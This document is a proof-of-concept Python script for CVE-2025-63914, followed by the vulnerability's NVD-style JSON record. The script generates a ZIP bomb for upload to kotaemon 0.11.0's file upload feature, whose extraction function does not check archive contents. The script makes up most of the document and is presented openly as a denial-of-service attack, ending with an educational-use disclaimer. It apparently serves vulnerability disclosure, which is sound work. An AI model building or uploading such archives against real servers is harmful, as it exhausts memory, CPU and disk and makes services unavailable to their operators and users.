CVE-2025-63914

#!/usr/bin/env python3 """ CVE-2025-63914 PoC - ZIP Bomb DoS Attack for kotaemon This PoC demonstrates how to create a ZIP bomb that can cause denial of service when uploaded to kotaemon's file upload feature. """ import zipfile import os def create_zip_bomb(output_path='malicious.zip', compression_ratio=10000): """ Create a ZIP bomb file for testing purposes. Args: output_path: Path to save the ZIP bomb compression_ratio: Target compression ratio (e.g., 10000 means 1KB -> 10MB) """ # Create a simple pattern that compresses extremely well # Using repeated 'A' characters achieves maximum compression bomb_data = b'A' * (1024 * compression_ratio) # 10MB of 'A's -> ~1KB compressed with zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED) as zf: # Set extreme compression level zf.compresslevel = 9 zf.writestr('bomb_payload.txt', bomb_data) print(f'[+] ZIP bomb created: {output_path}') print(f'[+] Original size: {len(bomb_data)} bytes') print(f'[+] Compressed size: {os.path.getsize(output_path)} bytes') print(f'[+] Compression ratio: {len(bomb_data) // max(os.path.getsize(output_path), 1)}:1') return output_path def verify_zip_bomb(zip_path): """Verify the ZIP bomb can be extracted and causes resource consumption.""" print(f'\n[!] Testing ZIP bomb extraction...') with zipfile.ZipFile(zip_path, 'r') as zf: for info in zf.infolist(): print(f'[+] File: {info.filename}') print(f'[+] Compressed size: {info.compress_size} bytes') print(f'[+] Uncompressed size: {info.file_size} bytes') # Note: In real attack, server would decompress this data # causing memory/CPU exhaustion if __name__ == '__main__': # Generate ZIP bomb zip_file = create_zip_bomb('CVE-2025-63914_bomb.zip', compression_ratio=10000) verify_zip_bomb(zip_file) print('\n[!] This PoC is for educational and security testing purposes only.')

{"cve": {"id": "CVE-2025-63914", "sourceIdentifier": "[email protected]", "published": "2025-11-24T20:15:50.320", "lastModified": "2025-12-30T17:33:21.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Cinnamon kotaemon 0.11.0. The _may_extract_zip function in the \\libs\\ktem\\ktem\\index\\file\\ui.py file does not check the contents of uploaded ZIP files. Although the contents are extracted into a temporary folder that is cleared before each extraction, successfully uploading a ZIP bomb could still cause the server to consume excessive resources during decompression. Moreover, if no further files are uploaded afterward, the extracted data could occupy disk space and potentially render the system unavailable. Anyone with permission to upload files can carry out this attack."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-409"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cinnamon:kotaemon:0.11.0:*:*:*:*:*:*:*", "matchCriteriaId": "7202887C-4D01-4D84-A56D-837E79118FD2"}]}]}], "references": [{"url": "https://github.com/Cinnamon/kotaemon", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/WxDou/CVE-2025-63914", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}